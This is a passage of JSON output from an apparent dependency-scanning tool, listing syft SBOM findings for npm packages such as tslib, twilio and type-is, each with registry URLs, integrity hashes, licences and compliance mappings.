{ "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "098e9c86e46e996b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: to-regex-range 5.0.1", "title": "to-regex-range 5.0.1", "description": "Package discovered: to-regex-range 5.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "32aacf96124c437a", "name": "to-regex-range", "version": "5.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:to-regex-range:to-regex-range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to-regex-range:to_regex_range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to_regex_range:to-regex-range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to_regex_range:to_regex_range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to-regex:to-regex-range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to-regex:to_regex_range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to_regex:to-regex-range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to_regex:to_regex_range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to:to-regex-range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:to:to_regex_range:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/to-regex-range@5.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", "dependencies": { "is-number": "^7.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "eba377c5cfb24e56", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: toidentifier 1.0.1", "title": "toidentifier 1.0.1", "description": "Package discovered: toidentifier 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ce376bb248c7ffa1", "name": "toidentifier", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:toidentifier:toidentifier:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/toidentifier@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "332c86a1be157c00", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: tr46 0.0.3", "title": "tr46 0.0.3", "description": "Package discovered: tr46 0.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "44b5fbfc3cffc498", "name": "tr46", "version": "0.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:tr46:tr46:0.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/tr46@0.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "975e90d4d26bc8ab", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ts-interface-checker 0.1.13", "title": "ts-interface-checker 0.1.13", "description": "Package discovered: ts-interface-checker 0.1.13", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4b85ef460bf1550e", "name": "ts-interface-checker", "version": "0.1.13", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ts-interface-checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts-interface-checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts_interface_checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts_interface_checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts-interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts-interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts_interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts_interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ts:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ts-interface-checker@0.1.13", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ts-interface-checker/-/ts-interface-checker-0.1.13.tgz", "integrity": "sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ef69db02aad9ddba", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: tslib 2.4.1", "title": "tslib 2.4.1", "description": "Package discovered: tslib 2.4.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a41a6d4fcfaa1c57", "name": "tslib", "version": "2.4.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "0BSD", "spdxExpression": "0BSD", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:tslib:tslib:2.4.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/tslib@2.4.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "15d8d07e284b7f66", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: tslib 2.8.1", "title": "tslib 2.8.1", "description": "Package discovered: tslib 2.8.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "732c6f5be784c8f2", "name": "tslib", "version": "2.8.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "0BSD", "spdxExpression": "0BSD", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:tslib:tslib:2.8.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/tslib@2.8.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d407f6f6881f51f1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: twilio 5.13.1", "title": "twilio 5.13.1", "description": "Package discovered: twilio 5.13.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b26b672319df2e47", "name": "twilio", "version": "5.13.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:twilio:twilio:5.13.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/twilio@5.13.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/twilio/-/twilio-5.13.1.tgz", "integrity": "sha512-sT+PkhptF4Mf7t8eXFFvPQx4w5VHnBIPXbltGPMFRe+R2GxfRdMuFbuNA/cEm0aQR6LFQOn33+fhClg+TjRVqQ==", "dependencies": { "axios": "^1.13.5", "dayjs": "^1.11.9", "https-proxy-agent": "^5.0.0", "jsonwebtoken": "^9.0.3", "qs": "^6.14.1", "scmp": "^2.1.0", "xmlbuilder": "^13.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1b446cdccc9a93b0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: type-is 1.6.18", "title": "type-is 1.6.18", "description": "Package discovered: type-is 1.6.18", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a8ca97010550105a", "name": "type-is", "version": "1.6.18", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:type-is:type-is:1.6.18:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:type-is:type_is:1.6.18:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:type_is:type-is:1.6.18:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:type_is:type_is:1.6.18:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:type:type-is:1.6.18:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:type:type_is:1.6.18:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/type-is@1.6.18", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", "dependencies": { "media-typer": "0.3.0", "mime-types": "~2.1.24" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a01b70906be81bf9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: typedarray 0.0.6", "title": "typedarray 0.0.6", "description": "Package discovered: typedarray 0.0.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e635ba578a775ab5", "name": "typedarray", "version": "0.0.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:typedarray:typedarray:0.0.6:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/typedarray@0.0.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": 